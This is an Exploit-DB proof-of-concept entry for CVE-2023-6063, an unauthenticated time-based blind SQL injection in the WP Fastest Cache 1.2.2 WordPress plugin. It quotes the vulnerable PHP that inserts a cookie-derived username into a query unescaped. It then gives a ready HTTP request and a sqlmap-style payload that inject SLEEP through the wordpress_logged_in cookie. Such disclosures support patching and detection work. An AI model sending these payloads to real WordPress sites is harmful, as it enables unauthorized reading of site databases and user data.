WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection

EDB-ID:

51835

CVE:

N/A




Platform:

PHP

Date:

2024-02-28


# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Taşkın
# Vendor Homepage: https://www.wpfastestcache.com/
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063
 
## Description
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
 
## Vuln Code
 
public function is_user_admin(){
            global $wpdb;
            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
                if(preg_match("/wordpress_logged_in/i", $cookie_key)){ 
                    $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); 
                    break;
                }
            }
            if(isset($username) && $username){            
                $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                                       FROM `$wpdb->users`
                                       INNER JOIN `$wpdb->usermeta`
                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection
                                       .....
 
## Exploit
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
 
## Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
---
 
## References
- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)
 
## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Taşkın